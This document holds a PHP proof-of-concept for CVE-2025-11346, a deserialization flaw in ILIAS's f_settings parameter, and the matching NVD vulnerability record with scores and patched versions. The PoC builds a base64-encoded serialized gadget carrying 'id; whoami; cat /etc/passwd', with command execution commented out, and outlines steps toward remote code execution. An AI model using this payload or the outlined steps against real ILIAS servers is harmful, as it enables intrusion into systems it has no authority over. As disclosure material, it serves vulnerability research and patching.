CVE-2025-11346

<?php /** * CVE-2025-11346 - ILIAS Deserialization Vulnerability PoC * Target: ILIAS Base64 Decoding Handler - unserialize() on f_settings * Vulnerability: Unsafe deserialization leading to RCE * * Note: This PoC demonstrates the concept of the deserialization attack. * A real exploit requires a working POP gadget chain specific to the * target ILIAS installation's libraries. */ // Step 1: Define a malicious class that will be triggered during deserialization class MaliciousGadget { public $cmd; public function __destruct() { // This destructor is automatically called during unserialize() // In a real exploit, this would execute system commands echo "[+] Deserialization triggered!\n"; echo "[+] Command would execute: " . $this->cmd . "\n"; // system($this->cmd); // Actual command execution in real exploit } } // Step 2: Create the malicious payload object $payload = new MaliciousGadget(); $payload->cmd = "id; whoami; cat /etc/passwd"; // Step 3: Serialize the object $serialized = serialize($payload); echo "[*] Serialized payload: " . $serialized . "\n"; // Step 4: Base64 encode the serialized data (as expected by ILIAS handler) $encoded = base64_encode($serialized); echo "[*] Base64 encoded payload: " . $encoded . "\n"; // Step 5: Simulate the exploit request // The f_settings parameter is sent to the vulnerable endpoint $target_url = "https://target-ilias-instance/ilias.php"; $post_data = array( 'f_settings' => $encoded, // Additional parameters may be required depending on the specific endpoint ); /* * Real exploitation steps: * 1. Obtain valid low-privilege credentials to the ILIAS instance * 2. Identify the vulnerable endpoint accepting f_settings parameter * 3. Find or construct a POP gadget chain using ILIAS's available classes * 4. Send the crafted payload via POST request * 5. Achieve Remote Code Execution on the target server */ // For verification, demonstrate the unsafe unserialize behavior: // echo "[*] Triggering unserialize...\n"; // $result = unserialize(base64_decode($encoded)); ?>

{"cve": {"id": "CVE-2025-11346", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:35.313", "lastModified": "2026-01-23T19:15:52.330", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in ILIAS up to 8.23/9.13/10.1. This affects the function unserialize of the component Base64 Decoding Handler. Such manipulation of the argument f_settings leads to deserialization. It is possible to launch the attack remotely. Upgrading to version 8.24, 9.14 and 10.2 is able to mitigate this issue. It is advisable to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:8.23:*:*:*:*:*:*:*", "matchCriteriaId": "58F9FBA3-89C9-4EC7-9913-770F9C71A569"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:9.13:*:*:*:*:*:*:*", "matchCriteriaId": "BE5461D9-97C8-4DEE-8E3D-AAEE8840A209"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ilias:ilias:10.1:*:*:*:*:*:*:*", "matchCriteriaId": "B4E16B93-654E-47D4-A498-C759D1F4B1EB"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327231", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327231", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664892", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2113", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://srlabs.de/blog/breaking-ilias-part-2-three-to-rce", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}